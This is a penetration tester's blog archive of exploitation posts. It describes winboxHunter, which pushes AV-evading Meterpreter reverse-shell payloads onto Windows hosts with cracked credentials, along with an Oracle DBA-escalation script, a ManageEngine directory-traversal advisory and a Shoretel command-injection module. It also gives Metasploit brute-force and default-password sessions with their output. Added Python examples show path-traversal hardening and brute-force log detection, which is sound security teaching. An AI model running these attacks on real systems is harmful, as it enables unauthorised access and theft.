Archive for the ‘Exploitation’ Category


August 27, 2014


- Python2.7
- Impacket (svn checkout impacket-read-only)
- Ruby
- Veil Evasion (git clone


If you are working on a penetration test remotely, it's sometimes hard to determine when the users start work or connect their laptops to the network.

winboxHunter is useful if you have managed to capture and crack a bunch of NTLM credentials and want to run Metasploit against these Windows boxes as and when they are connected to the network.

winboxHunter listens for NBNS broadcast packets so that when a new winBox is connected to the network, it will use the Impacket scripts ( and to push an executable onto the winBox and run it.

In the background, winboxHunter runs Metasploit with a payload handler (multi/handler) and listens for incoming connections from the winboxes.

You might want to modify autorunCmd.rc to specify the Metasploit commands you want to run on the pwned winbox upon connecting back to Metasploit.

See meterpreter.rc and autorunCmd.rc for more details.

If a host changes its IP address due to DHCP lease expiration, winboxHunter will not attempt to exploit the winbox twice.

Format of password.txt

domain/username password


Meterpreter executable

You only need to use one of the two options below.

- You can either use your own meterpreter payload executable using the -e or --exe argument (payload=windows/meterpreter/reverse_https, rport=8443), or

- You can use the -n or --enableVeil argument to generate a meterpreter payload executable using Veil Evasion

You can run winboxHunter using the sample command below.

ruby winboxHunter.rb -n -f password.txt -v

When you run winboxHunter, a Linux screen session with the name “msfscreen” will be created and msfconsole will be executed. You can connect to the screen via the command below.

screen -dr msfscreen

The source code for winboxHunter can be found at

Oracle Exploitation – Privilege Escalation

September 7, 2013


Many times during penetration tests, we find a limited account on the Oracle database server. The next step is to find a SQL injection vulnerability to obtain DBA privileges. There are a number of Metasploit modules that we can use to escalate to DBA privileges. The Metasploit modules below are for different versions of Oracle database servers. I can't remember which Metasploit modules are for which versions.

Metasploit Oracle SQL Injection Modules

To speed things up, I wrote a script that does the below

(1) Check if the account specified has access to the database
(2) Check if the account has DBA privileges
(3) If no, check the version of the Oracle database server
(4) Select the relevant Oracle SQL injection modules for that version of Oracle database and write a Metasploit resource script to disk
(5) Run the Metasploit resource script and attempt to gain DBA privileges
(6) Check the permissions of the account and verify whether DBA privileges have been obtained

The script is still a work in progress.  You can download the script via the below link.

Categories: Exploitation, Oracle

WordPress Plugin NextGEN Gallery 1.9.12 Arbitrary File Upload vulnerability (CVE-2013-3684)

August 10, 2013

I converted the original WordPress Plugin NextGEN Gallery 1.9.12 Arbitrary File Upload exploit from Perl to Python for fun.

The original exploit can be found at

Below is the Python script for CVE-2013-3684


Categories: Exploitation

Vuln Details for ManageEngine ServiceDesk Plus 8.0 Released

June 23, 2011

I have been working with the ManageEngine support team for over a month on getting the issue fixed and on informing customers to patch their systems with the latest service pack release, version 8012.

The vulnerability has been published in the below sites.

Below are the details of the vulnerability.

Google Dork: ie: intitle:"ManageEngine ServiceDesk Plus"
Author: Keith Lee, @keith55

Software Link:
Version: 8.0


Directory traversal vulnerabilities have been found in ManageEngine ServiceDesk Plus 8.0, a web-based helpdesk system written in Java.

The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. The attackers use "../" sequences to move up to the root directory, thus permitting navigation through the file system.

GET http://%5Bwebserver

The issue is fixed with Service Pack Build 8012 found in the below link.
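
The root cause described above is a request value used to build a file path without checking where the result lands. As an added example (written in Python for this page, not ManageEngine's code and not part of the original advisory), the following contrasts an unchecked join with a canonicalise-then-contain check; the directory layout, file names and function names are constructed for illustration.

```python
import os
import tempfile

class TraversalError(ValueError):
    """The requested name resolves outside the directory being served."""

def naive_path(base_dir, name):
    # "Before": the request value is joined into the path unchecked, so
    # "../" sequences walk out of base_dir.
    return os.path.normpath(os.path.join(base_dir, name))

def safe_path(base_dir, name):
    # NUL and backslash have no place in this parameter; backslash is also a
    # path separator on Windows hosts.
    if "\x00" in name or "\\" in name:
        raise TraversalError("illegal character in %r" % name)
    base = os.path.realpath(base_dir)
    # realpath collapses "../" and follows symlinks, so the containment test
    # runs on the path that would really be opened.
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise TraversalError("%r escapes %s" % (name, base))
    return target

def demo():
    """Run constructed request values through both versions."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "attachments")      # constructed layout
        os.mkdir(base)
        open(os.path.join(base, "report.txt"), "w").close()
        open(os.path.join(root, "secret.conf"), "w").close()
        os.symlink(root, os.path.join(base, "link"))  # symlink leaving base
        for name in ("report.txt", "../secret.conf", "link/secret.conf",
                     "/etc/passwd", "..\\secret.conf"):
            # String-level view only: does the normalised path leave base?
            escapes = not naive_path(base, name).startswith(base + os.sep)
            try:
                safe_path(base, name)
                verdict = "allowed"
            except TraversalError:
                verdict = "blocked"
            results[name] = (escapes, verdict)
    return results

if __name__ == "__main__":
    for name, (escapes, verdict) in demo().items():
        print("%-18s string escapes=%-5s hardened=%s" % (name, escapes, verdict))
```

The symlink case passes a string prefix check on the normalised path and is only caught because the hardened version resolves the path before testing containment.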

Categories: Exploitation

Found a zero day for major helpdesk system

June 18, 2011

Watch this space. I will publish this in the next couple of days. Most companies published their help desk on the Internet.

Categories: Exploitation

Hacking Shoretel Converged Conferencing Bridge

April 15, 2011

This Metasploit module was made with the help of Josh @savant42 for #thotcon.
The methodology of this hack comes entirely from Josh. This Metasploit module was made by both of us.

Thumbs up to Josh for coming up with this.

This post is based on Josh’s (@savant42) talk at #thotcon

In the Shoretel Converged Conferencing Bridge, the Monitoring > System Commands page is vulnerable to command injection.

Another problem is that the backup job runs as root.

This can be found under Configuration > Manual Server Backup.

Based on these 2 vulnerabilities, this metasploit module is born.

A demo video of the metasploit module can be found here

The metasploit module can be found here

Below is a screenshot of the metasploit module in action

Categories: Exploitation, Metasploit

Exploiting Shoretel Server

March 20, 2011

Hacking Shoretel Voip Server

A demo has been uploaded to youtube

The meterpreter script can be used to audit the user accounts on the Shoretel server. This is written for Shoreware Director Build 14.X

There are 2 ways of accessing Shoretel voice services: one via the IP phone and another via the soft client (Shoretel Call Manager client).
The default password for Shoretel Call Manager is ‘changeme’, and if a person has never logged in to the Shoretel Call Manager client before, he/she will not be able to change the password.
What are the complications if you have never changed the password for your soft client login?
It means that an intruder will be able to log in to your extension using the default password ‘changeme’ and

1. Access Call Logs
2. Make Calls
3. Access Your Voice Mails
4. Eavesdrop on an Extension via Intercom ?
5. Impersonate another user and send malicious links to other users via the IM feature.

Mitigation Methods

Up to now, I do not know of any options in Shoreware Director to change the default call manager password other than manually editing each account and changing the password.
Enabling AD authentication might be another viable option.

You can download my meterpreter script from to audit the accounts on your servers which are using the default password.

Bruteforce a user account using default passwords

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS
msf > set USERNAME test1
msf > set TEST_OPTION 1
msf > run

[*] Shoreware Director Web Console - Testing Default Passwords for User Accounts
[*] - Trying username:'user1' password:'changeme'
[-] - Successful login 'user1' : 'changeme'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Bruteforce using password list (Dictionary Attack)
Since the Shoretel system places no restrictions on the complexity of the passwords that users can set for their soft client login, and has no account lockout policy (for non-AD authentication), it is possible to brute force an account.

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS
msf > set TEST_OPTION 2
msf > set USERNAME user1
msf > run

[*] - Trying username:'user1' password:'1234'
[-] - Failed to login as 'user1' using password '1234'
[*] - Trying username:'user1' password:'12345'
[-] - Successful login 'user1' : '12345'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Check which user accounts are using default passwords

If you already have access to the target’s computer, you can use the getOAB script I wrote to extract all email addresses from the Outlook Offline Address Book to be used for this test.
Check this blog post for more information

msf > use auxiliary/gather/search_email_collector
msf > set DOMAIN
msf > set OUTFILE "c:/Program Files/Rapid7/framework/msf3/data/wordlists/shoretel_users.txt"
msf > run

Edit shoretel_users.txt and make sure that there is one username on each line

msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS
msf > set BRUTEFORCE_SINGLE false
msf > set TEST_OPTION 1
msf > run

[*] - Trying username:'user1' password:'changeme'
[-] - Invalid Username 'user1'
[*] - Trying username:'user2' password:'changeme'
[-] - Successful login 'user2' : 'changeme'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Use Dictionary Attacks Against User Accounts
msf > use auxiliary/scanner/http/shoretelbrute
msf > set RHOSTS
msf > set BRUTEFORCE_SINGLE false
msf > set TEST_OPTION 2
msf > set PASS_FILE "C:/Program Files/Rapid7/framework/msf3/data/wordlists/dict.txt"
msf > run
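
Both the dictionary attack and the default-password check across many usernames depend on the missing lockout policy noted above, and both leave a pattern in login records. The following Python is an added example, not part of the original post or the Metasploit module: it replays constructed login records (the line format, addresses and thresholds are assumptions, not Shoretel's) and reports where a lockout would have tripped, which sources tried many usernames, and which successful logins followed such guessing.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: timestamp, source, username, result.
SAMPLE_LOG = """\
2011-03-20T09:00:00 10.0.0.5 user1 FAIL
2011-03-20T09:00:02 10.0.0.5 user1 FAIL
2011-03-20T09:00:04 10.0.0.5 user1 FAIL
2011-03-20T09:00:06 10.0.0.5 user1 FAIL
2011-03-20T09:00:08 10.0.0.5 user1 FAIL
2011-03-20T09:00:10 10.0.0.5 user1 OK
2011-03-20T09:05:00 10.0.0.9 user2 FAIL
2011-03-20T09:05:20 10.0.0.9 user2 OK
2011-03-20T10:00:00 10.0.0.7 alice FAIL
2011-03-20T10:00:01 10.0.0.7 bob FAIL
2011-03-20T10:00:02 10.0.0.7 carol FAIL
2011-03-20T10:00:03 10.0.0.7 dave OK
"""

def analyse(log_text, max_failures=5, max_users=3, window=timedelta(minutes=1)):
    """Return (lockouts, takeovers, sprayers) found in the login records."""
    by_user = defaultdict(list)  # username -> failure times inside the window
    by_src = defaultdict(list)   # source -> (time, username) failures in window
    lockouts, takeovers, sprayers = {}, [], set()
    for line in log_text.splitlines():
        stamp, src, user, result = line.split()
        ts = datetime.fromisoformat(stamp)
        # Age out failures older than the window before counting.
        by_user[user] = [t for t in by_user[user] if ts - t <= window]
        by_src[src] = [(t, u) for t, u in by_src[src] if ts - t <= window]
        if result == "FAIL":
            by_user[user].append(ts)
            by_src[src].append((ts, user))
        guessed = len(by_user[user]) >= max_failures
        spraying = len({u for _, u in by_src[src]}) >= max_users
        if result == "FAIL":
            if guessed:
                lockouts.setdefault(user, ts)  # where a lockout would trip
            if spraying:
                sprayers.add(src)              # one source, many usernames
        elif guessed or spraying:
            takeovers.append((user, src))      # success during active guessing
    return lockouts, takeovers, sprayers

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

A user who mistypes a password once and then logs in (user2 in the sample) is not reported; guessing spread out more slowly than the window is not caught by these thresholds.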

Categories: Exploitation, Metasploit
